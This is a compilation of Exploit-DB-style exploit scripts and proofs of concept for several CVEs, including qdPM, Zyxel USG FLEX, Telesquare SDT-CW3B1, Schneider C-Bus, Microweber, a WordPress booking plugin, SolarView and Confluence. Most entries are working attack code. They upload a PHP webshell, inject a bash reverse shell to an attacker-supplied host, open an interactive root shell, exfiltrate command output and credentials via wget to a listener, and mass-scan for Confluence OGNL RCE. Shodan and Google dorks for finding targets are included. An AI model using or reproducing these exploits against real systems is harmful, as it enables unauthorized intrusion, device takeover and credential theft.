# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2021-08-03 # Original Exploit Author: Rishal Dwivedi (Loginsoft) # Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954) # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Ubuntu Server 20.04 (Python 3.9.2) # CVE : CVE-2020-7246 # Exploit written in Python 3.9.2 # Tested Environment - Ubuntu Server 20.04 LTS # Path Traversal + Remote Code Execution # Exploit modification: RedHatAugust #!/usr/bin/python3 import sys import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req(userid, username, csrftoken_, EMAIL, HOSTNAME): request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess') new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1) request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess') new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ 
echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): url = HOSTNAME + '/index.php/login' result = session_requests.get(url) #print(result.text) login_tree = html.fromstring(result.text) authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) # The designated admin account does not have a myAccount page account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = requests.get(HOSTNAME + "uploads/users/") count = 0 dateStamp = "1970-01-01 00:00" backdoorFile = "" for line in backdoor.text.split("\n"): count = count + 1 if "backdoor.php" in str(line): try: start = "\"right\"" end = " </td" line = str(line) dateStampNew = line[line.index(start)+8:line.index(end)] if (dateStampNew > dateStamp): dateStamp = dateStampNew print("The DateStamp is " + dateStamp) backdoorFile = line[line.index("href")+6:line.index("php")+3] except: print("Exception occurred") continue #print(backdoor) print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami') if __name__ == '__main__': print("You are not able to use the designated admin account because they 
do not have a myAccount page.\n") parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit') parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() # Added detection if the arguments are passed and populated, if not display the arguments if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)): main(args.hostname, args.email, args.password) else: parser.print_help()
Zyxel USG FLEX 5.21 - OS Command Injection
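# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
#
# The unauthenticated /ztp/cgi-bin/handler endpoint hands the "mtu" field of a
# setWanPortSt command to a shell unsanitised; the payload below injects a bash
# reverse shell into that field.  Because the injected shell blocks the CGI
# handler, a successful run shows up on our side as a request *timeout*, not as
# an HTTP response -- so a timeout is treated as "check your listener", and an
# actual HTTP reply is reported as a failure.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse

parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")

# Vulnerable CGI, appended to the scheme-qualified target URL.
HANDLER_PATH = "/ztp/cgi-bin/handler"
# Seconds to wait for the device; a blocked handler (shell spawned) never answers.
HTTP_TIMEOUT = 5

banner = (
    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)


def normalize_target(url):
    """Return *url* with ``https://`` prepended unless it already carries a scheme.

    The original test was ``"http" not in url``, which misfires on any host name
    that merely contains that substring (e.g. ``httpgw.example``).
    """
    if not url.lower().startswith(("http://", "https://")):
        url = "https://" + url
    return url


def build_payload(host, port):
    """Return the JSON body (as a dict) whose ``mtu`` field carries the bash reverse shell to host:port."""
    return {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }


def main():
    """Print the banner, validate arguments and fire the exploit.

    Argument parsing happens here rather than at import time so the module can
    be imported (e.g. by tests) without argparse exiting the process.
    """
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    args = parser.parse_args()
    if None in vars(args).values():
        print("[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()
    exploit(normalize_target(args.url) + HANDLER_PATH, args.host, args.port)


def exploit(url, host, port):
    """POST the injected setWanPortSt command to *url* (the full handler URL).

    Outcomes:
      * timeout       -> the handler is most likely blocked on our shell; check
                         the listener (or the host simply did not answer).
      * HTTP response -> the injection did not take; status code is printed.
      * network error -> reported and the script exits 1.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }
    data = build_payload(host, port)
    # Devices ship self-signed certificates; verification is deliberately off.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {url.replace(HANDLER_PATH, '')}")
    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=HTTP_TIMEOUT
        )
    except KeyboardInterrupt:
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    except requests.exceptions.Timeout:
        # Expected on success: the CGI never returns while our shell runs.
        print(f"[!] No reply within {HTTP_TIMEOUT}s - handler is probably blocked on the shell. Check {host}:{port}")
        print("[!] Enjoy your shell !!!")
        return
    except requests.exceptions.RequestException as exc:
        print(f"[!] Can't reach the target ! {exc}")
        sys.exit(1)
    print("[!] Can't exploit the target ! Code :", response.status_code)


if __name__ == "__main__":
    main()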
Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
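#!/usr/bin/python3
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No
#
# The router's /cgi-bin/admin.cgi exposes Command=sysCommand&Cmd=<shell command>
# to unauthenticated callers and echoes the command output back inside a
# <CmdResult> XML element.  This script checks the CGI answers, runs `id` as a
# probe and then drops into a simple command loop.
import io
import requests
import argparse
import sys
from urllib.parse import quote
from xml.etree import ElementTree

# Seconds to wait for the router on every request (the original had no timeout,
# so its "Timeout" handler could never fire).
TIMEOUT = 10
CGI_BASE = "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="


def sysArgument():
    """Parse the command line and return the target host/IP string."""
    ap = argparse.ArgumentParser()
    ap.add_argument("--host", required=True, help="target hostname/IP")
    args = vars(ap.parse_args())
    return args['host']


def command_url(host, cmd):
    """Return the injection URL for *cmd* on *host*.

    The command is percent-encoded (safe='') so shell metacharacters such as
    ``&``, ``#`` and ``;`` -- which would otherwise terminate or corrupt the
    query string -- reach the CGI intact.
    """
    return "http://" + host + CGI_BASE + quote(cmd, safe='')


def parse_cmd_results(source):
    """Return the text of every <CmdResult> element in *source*.

    *source* is raw XML as bytes, or a file-like object yielding bytes (e.g. a
    streamed response body).  Empty elements yield '' rather than None so the
    caller can strip() unconditionally.  Raises ElementTree.ParseError when
    the data is not XML.
    """
    if isinstance(source, (bytes, bytearray)):
        source = io.BytesIO(source)
    results = []
    for _event, elem in ElementTree.iterparse(source):
        if elem.tag == 'CmdResult':
            results.append(elem.text or '')
    return results


def run_command(host, cmd):
    """Send *cmd* to the router and return the list of <CmdResult> texts.

    Raises requests.exceptions.RequestException on network failure and
    ElementTree.ParseError when the reply is not XML.
    """
    rsl = requests.get(command_url(host, cmd), stream=True, timeout=TIMEOUT)
    return parse_cmd_results(rsl.raw)


def checkHost(host):
    """Abort (SystemExit) unless *host* answers a plain HTTP GET."""
    url = "http://" + host
    print("[*] Checking host is it alive?")
    try:
        requests.get(url, timeout=TIMEOUT)
        print("[*] The host is alive.")
    except requests.exceptions.RequestException as err:
        # Covers timeouts *and* connection refusals; the original only
        # caught Timeout and let everything else traceback.
        raise SystemExit(err)


def exploit(host):
    """Probe the CGI with `id`, then run an interactive command loop until `.exit`."""
    url = "http://" + host + CGI_BASE
    # Does the CGI exist at all?
    try:
        rsl = requests.get(url, timeout=TIMEOUT)
    except requests.exceptions.RequestException as err:
        raise SystemExit(err)
    if rsl.status_code != 200:
        print("[!] CGI script not found.")
        print(rsl.status_code)
        sys.exit(0)
    print("[*] CGI script exist!")
    print("[*] Injecting some shell command.")
    # First test: inject `id` and look for a <CmdResult> element in the reply.
    try:
        cmdRet = run_command(host, "id")
    except (requests.exceptions.RequestException, ElementTree.ParseError):
        print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
        sys.exit(0)
    if not cmdRet:
        print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
        sys.exit(0)
    print("[*] There's response from the CGI script!")
    print('[*] System ID: ' + cmdRet[0].strip())
    print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
    while True:
        cmdInput = input("[SDT-CW3B1 Shell]# ")
        if cmdInput == ".exit":
            print("[*] Exiting shell.")
            sys.exit(0)
        try:
            for text in run_command(host, cmdInput):
                print(text.strip())
        except (requests.exceptions.RequestException, ElementTree.ParseError) as err:
            # Keep the shell alive on a bad command/reply instead of crashing.
            print("[!] Command failed: " + str(err))
        print('\n')


def main():
    host = sysArgument()
    checkHost(host)
    exploit(host)


if __name__ == "__main__":
    main()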
Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE) # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit # # # Vendor: Schneider Electric SE # Product web page: https://www.se.com | https://www.clipsal.com # Product details: # - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC # - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/ # Affected version: CLIPSAL 5500SHAC (i.MX28) # CLIPSAL 5500NAC (i.MX28) # SW: 1.10.0, 1.6.0 # HW: 1.0 # Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2 # SpaceLogic C-Bus # # Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser # for C-Bus Automation Controller (5500SHAC)) is an advanced controller from # Schneider Electric. It is specifically designed to unite the C-Bus home # automation solution with common household communication protocols, from # lighting and climate control, to security, entertainment and energy metering. # The Wiser for C-Bus Automation Controller manages and controls C-Bus systems # for residential homes or zones within a building and integrates functions # such as heating/cooling, energy/load monitoring and remote control for C-Bus # and Modbus. # # Desc: The automation controller suffers from an authenticated arbitrary # command execution vulnerability. An attacker can abuse the Start-up (init) # script editor and exploit the 'script' POST parameter to insert malicious # Lua script code and execute commands with root privileges that will grant # full control of the device. 
# # ------------------------------------------------------------------------------ # $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888 # ---------------------------------------------------------------------- # Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38 # [*] Starting exfiltration handler on port 8888 # [*] Writing Lua initscript... done. # [*] Running os.execute()... done. # [*] Got request from 192.168.0.10:33522 # [*] Printing target's request: # # b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user # 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption # password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection: # close\r\n\r\n" # # [*] Cleaning up... done. # # $ # ------------------------------------------------------------------------------ # # Tested on: CPU model: ARM926EJ-S rev 5 (v5l) # GNU/Linux 4.4.115 (armv5tejl) # LuaJIT 2.0.5 # FlashSYS v2 # nginx # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2022-5707 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php # # # 12.03.2022 # import threading#! import datetime##! import requests##! import socket####! import time######! import sys#######! import re########! 
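from requests.auth import HTTPBasicAuth
from time import sleep as spikaj
import os


class Wiser:
    """Authenticated root RCE against the C-Bus automation controller (ZSL-2022-5707).

    Flow, driven by main(): parse argv, start a TCP listener thread, POST a Lua
    init script to /scada-main/scripting/save whose os.execute() makes the
    device wget our listener with the command output in the User-Agent header,
    trigger it via /scada-main/scripting/run, print what arrives, then blank the
    init script again so it does not persist.
    """

    # Form body for /scada-main/scripting/save, minus the os.execute() call that
    # build_save_body() appends.  The original PoC spelled these bytes as \xNN
    # escapes; this is the identical text, just readable.
    SAVE_PREFIX = ('data={"ext-comp-1004":"","ext-comp-1005":"","ext-comp-1006":"",'
                   '"ext-comp-1007":"","ext-comp-1008":"","scada-help-search":"",'
                   '"id":"initscript","script":null,"scriptonly":"true"}&script=')
    # Form body for /scada-main/scripting/run.
    RUN_BODY = 'data={"id":"initscript"}'
    # URL-encoded save body that resets the init script to an empty string.
    CLEAN_BODY = ('data=%7B%22ext-comp-1004%22%3A%22%22%2C%22ext-comp-1005%22%3A%22%22%2C'
                  '%22ext-comp-1006%22%3A%22%22%2C%22ext-comp-1007%22%3A%22%22%2C'
                  '%22ext-comp-1008%22%3A%22%22%2C%22scada-help-search%22%3A%22%22%2C'
                  '%22id%22%3A%22initscript%22%2C%22script%22%3A%22%22%2C'
                  '%22scriptonly%22%3A%22true%22%7D')
    # Seconds the listener waits for the device to call back.
    CALLBACK_TIMEOUT = 9
    # Per-request HTTP timeout; the original requests had none and could hang.
    HTTP_TIMEOUT = 15

    def __init__(self):
        self.headers = None
        self.uri = '/scada-main/scripting/'
        self.savs = self.uri + 'save'
        self.runs = self.uri + 'run'
        self.start = datetime.datetime.now().strftime('%d.%m.%Y %H:%M:%S')
        # Device web credentials.  The PoC's defaults are kept, but they are
        # target-specific, so allow an override without editing the file.
        self.creds = HTTPBasicAuth(os.environ.get('CBUS_USER', 'admin'),
                                   os.environ.get('CBUS_PASS', 'admin123'))
        # Set by exfil() once the device has called back; drives the exit code.
        self.got_callback = False

    @staticmethod
    def build_save_body(cmd, lhost, lport):
        """Return the save-form body that runs *cmd* and ships its output to lhost:lport.

        The Lua side is os.execute('wget -U "`cmd`" lhost:lport'): the shell
        expands the back-ticks, so the command output becomes the User-Agent of
        a wget request to our listener.  *cmd* is spliced in verbatim -- a
        command containing back-ticks or single quotes breaks the Lua string.
        """
        lua = "os.execute('wget -U \"`" + cmd + "`\" " + lhost + ':' + str(lport) + "')"
        return Wiser.SAVE_PREFIX + lua

    def memo(self):
        """Read argv (target, command, listener host, listener port) or print usage."""
        if len(sys.argv) != 5:
            self.use()
        else:
            self.target = sys.argv[1]
            self.execmd = sys.argv[2]
            self.localh = sys.argv[3]
            self.localp = int(sys.argv[4])
            # Substring test ('http' in target) misfired on host names that
            # merely contain "http"; check for an actual scheme instead.
            if not self.target.lower().startswith(('http://', 'https://')):
                self.target = 'http://{}'.format(self.target)

    def _post(self, path, body):
        """POST *body* to target+path with the current headers/creds; None on network error."""
        try:
            return requests.post(self.target + path, data=body, headers=self.headers,
                                 auth=self.creds, timeout=self.HTTP_TIMEOUT)
        except requests.exceptions.RequestException as err:
            print('request failed ({})'.format(err))
            return None

    def exfil(self):
        """Accept one callback from the device and print the raw request.

        The command output travels in the User-Agent header of that request.
        Stops after the first connection (the original kept waiting and always
        ended with the "port mappings" warning even after a success), then
        blanks the init script via clean().
        """
        print('[*] Starting exfiltration handler on port {}'.format(self.localp))
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(('0.0.0.0', self.localp))
            s.listen(1)
            s.settimeout(self.CALLBACK_TIMEOUT)
            try:
                conn, addr = s.accept()
            except socket.timeout:
                print('[!] Something\'s not right. Check your port mappings!')
            else:
                with conn:
                    print('[*] Got request from {}:{}'.format(addr[0], addr[1]))
                    data = conn.recv(2003)
                    print('[*] Printing target\'s request:')
                    print('\n%s' % data)
                self.got_callback = True
        self.clean()

    def mtask(self):
        """Start the listener thread, run the exploit, wait for the callback/cleanup."""
        konac = threading.Thread(name='thricer.exe', target=self.exfil)
        konac.start()
        self.byts()
        konac.join()

    def byts(self):
        """Write the malicious init script, then trigger it."""
        self.headers = {
            'Referer': self.target + '/scada-main/main/editor?id=initscript',
            'Sec-Ch-Ua': '"(Not(A:Brand";v="8", "Chromium";v="98"',
            'Cookie': 'x-logout=0; x-auth=; x-login=1; pin=',
            'Content-Type': 'text/plain;charset=UTF-8',
            'User-Agent': 'SweetHomeAlabama/2003.59',
            'X-Requested-With': 'XMLHttpRequest',
            'Accept-Language': 'en-US,en;q=0.9',
            'Accept-Encoding': 'gzip, deflate',
            'Sec-Ch-Ua-Platform': '"Windows"',
            'Sec-Fetch-Site': 'same-origin',
            'Connection': 'keep-alive',
            'Sec-Fetch-Dest': 'empty',
            'Sec-Ch-Ua-Mobile': '?0',
            'Sec-Fetch-Mode': 'cors',
            'Origin': self.target,
            'Accept': '*/*',
            'sec-gpc': '1'
        }
        self.loada = self.build_save_body(self.execmd, self.localh, self.localp)
        self.loadb = self.RUN_BODY
        print('[*] Writing Lua initscript... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = self._post(self.savs, self.loada)
        if htreq is None or 'success' not in htreq.text:
            print('didn\'t work!')
            sys.exit(17)
        print('done.')
        print('[*] Running os.execute()... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = self._post(self.runs, self.loadb)
        if htreq is None or 'success' not in htreq.text:
            print('didn\'t work!')
            sys.exit(19)
        print('done.')

    def splash(self):
        # Cosmetic banner only.
        Baah_loon = '''
    ######
  ##########
 ######   _\\_
##===----[.].]
#(  ,    _\\\\
# )\\__|  \\ /
 `-._``-'  >@
    |  |
    |  |
    |   Schneider Electric C-Bus SmartHome Automation Controller
    |   Root Remote Code Execution Proof of Concept
    |   ZSL-2022-5707
    |
    |
'''
        print(Baah_loon)

    def use(self):
        self.splash()
        print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')
        print('       credentials default to admin/admin123; override with CBUS_USER / CBUS_PASS')
        exit(0)

    def clean(self):
        """Blank the init script so the payload does not run again on reboot.

        Runs on the listener thread; a failure is printed but (unlike the
        original's exit() calls, which a non-main thread ignores) cannot change
        the process exit status -- check the device if you see "didn't work!".
        """
        print('\n[*] Cleaning up... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        self.headers = {'X-Requested-With': 'XMLHttpRequest'}
        htreq = self._post(self.savs, self.CLEAN_BODY)
        if htreq is None or 'success' not in htreq.text:
            print('didn\'t work!')
        else:
            print('done.')

    def main(self):
        print('-' * 70)
        print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)
        self.memo()
        self.mtask()
        # Non-zero when the device never called back, so scripts can tell.
        sys.exit(0 if self.got_callback else 1)


if __name__ == '__main__':
    Wiser().main()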
Microweber CMS 1.2.15 - Account Takeover
# Exploit Title: Microweber CMS 1.2.15 - Account Takeover # Date: 2022-05-09 # Exploit Author: Manojkumar J # Vendor Homepage: https://github.com/microweber/microweber # Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15 # Version: <=1.2.15 # Tested on: Windows10 # CVE : CVE-2022-1631 # Description: Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 - OAuth misconfiguration leading to account takeover: a social (OAuth) login is matched to an existing local account purely by e-mail address, without checking that the local account's owner actually controls that address. # Steps to exploit: 1. Register a local account using the victim's e-mail address and a password of your choosing (the attack depends on registration succeeding without the attacker proving ownership of that address). Register endpoint: https://target-website.com/register# 2. When the victim later signs in through one of the built-in OAuth providers (Google, GitHub, Microsoft, Twitter, LinkedIn, Telegram, Facebook, ...) using that same e-mail address, the OAuth login resolves to the attacker-created account. The victim then uses an account whose password the attacker already knows, i.e. the attacker can take over the victim's account with the credentials chosen in step 1.
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) # Date: 2022-06-05 # Exploit Author: Sanjay Singh # Vendor Homepage: https://motopress.com/ # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip # Version: 4.2.4 # Tested on: Windows/XAMPP ########################################################################### PoC (authenticated: the attacker needs a WordPress account that is allowed to add Accommodation Types; the payload is stored and then rendered on the public accommodations listing, so it fires for any visitor of that page): 1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type 2. Click on "Add Accommodation Type". 3. Set the title to the payload: "><script>alert("XSS")</script> 4. Set the excerpt to the same payload: "><script>alert("XSS")</script> 5. Click publish. 6. Visit http://localhost/accommodations/ 7. The stored XSS payload executes.
SolarView Compact 6.00 - Directory Traversal
# Exploit Title: SolarView Compact 6.00 - Directory Traversal # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/ # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29298 # Tested on: Windows # Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
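#!/usr/bin/python3
# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 06/06/2022
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: all releases before the fixed builds 7.4.17 and 7.18.1 (see the vendor advisory for the other fixed branches)
# Tested on: -
# CVE : CVE-2022-26134
# https://github.com/h3v0x/CVE-2022-26134
#
# Pre-auth OGNL injection via the request path: the expression runs the
# command through java.lang.Runtime, reads its stdout with commons-io IOUtils
# and stores it in the X-Cmd-Response header of the (302) reply, so no
# out-of-band channel is needed to read the result.
import sys
import requests
import optparse
import functools
import multiprocessing
from urllib.parse import quote
from requests.packages import urllib3
from requests.exceptions import MissingSchema, InvalidURL

urllib3.disable_warnings()

# OGNL payload, split where the command is spliced in.  Already percent-encoded
# as the server expects it; only the command part is encoded at runtime.
OGNL_PREFIX = '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'
OGNL_SUFFIX = '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate",
}

# Results collected by main().  Plain list: workers now *return* their result
# instead of appending to a multiprocessing.Manager() list created at import
# time (which spawned a server process on every import, including in the
# pool's children under the spawn start method).
paramResults = []


def normalize_url(url):
    """Prepend http:// when *url* carries no scheme (same test as the original)."""
    if not url.startswith('http'):
        url = 'http://' + url
    return url


def build_payload_url(url, command):
    """Return the full exploit URL for *command* against *url*.

    The command is percent-encoded (spaces, ``&``, ``#`` ...) so it survives
    the URL path; ``/`` is left alone because servlet containers commonly
    reject an encoded slash in the path.  The OGNL side wraps the command in
    double quotes, so a command that itself contains ``"`` will not work as-is.
    """
    return normalize_url(url) + OGNL_PREFIX + quote(command) + OGNL_SUFFIX


def spiderXpl(url, command='id', timeout=8):
    """Fire the payload at *url*; return the result record on success, else None.

    A 302 carrying an X-Cmd-Response header means the OGNL expression ran and
    the header holds the command output.  Network failures are printed and
    yield None instead of crashing the worker.
    """
    payload = build_payload_url(url, command)
    try:
        response = requests.get(payload, headers=HEADERS, verify=False,
                                allow_redirects=False, timeout=timeout)
    except requests.exceptions.ConnectionError:
        print('[x] Failed to Connect: ' + url)
        return None
    except requests.exceptions.Timeout:
        print('[x] Timed out: ' + url)
        return None
    except (MissingSchema, InvalidURL):
        return None
    output = response.headers.get('X-Cmd-Response')
    if response.status_code == 302 and output is not None:
        print('Found: ' + url + ' // ' + output)
        return 'Vulnerable application found:' + url + '\n' + 'Command result:' + output + '\n'
    return None


def banner():
    print('[-] CVE-2022-26134')
    print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')


def build_parser():
    """Return the option parser (same options and defaults as the original)."""
    parser = optparse.OptionParser()
    parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
    parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
    parser.add_option('-t', '--threads', dest="threads_set", type=int, default=10)
    parser.add_option('-m', '--maxtimeout', dest="timeout", type=int, default=8)
    parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
    parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
    return parser


def main(optionsOpt=None):
    """Run against -u or every host in -f, then write the hits to -o.

    *optionsOpt* is the parsed optparse Values; when omitted, argv is parsed
    here (keeps the original ``main()`` call working).  The -m/--maxtimeout
    value is now actually applied to each request.
    """
    if optionsOpt is None:
        optionsOpt, _ = build_parser().parse_args()
    banner()
    if not optionsOpt.url and not optionsOpt.filehosts:
        build_parser().print_help()
        sys.exit(1)
    worker = functools.partial(spiderXpl, command=optionsOpt.command, timeout=optionsOpt.timeout)
    results = []
    try:
        if not optionsOpt.filehosts:
            results.append(worker(optionsOpt.url))
        else:
            with open(optionsOpt.filehosts) as f:
                urls = [line.strip() for line in f if line.strip()]
            with multiprocessing.Pool(optionsOpt.threads_set) as pool:
                results.extend(pool.map(worker, urls))
    except KeyboardInterrupt:
        print('[!] Stoping exploit...')
        sys.exit(0)
    paramResults.extend(r for r in results if r)
    if optionsOpt.output:
        print("\n[!] Saving the output result in: %s" % optionsOpt.output)
        with open(optionsOpt.output, "w") as f:
            for result in paramResults:
                f.write("%s\n" % result)


if __name__ == "__main__":
    optionsOpt, args = build_parser().parse_args()
    main(optionsOpt)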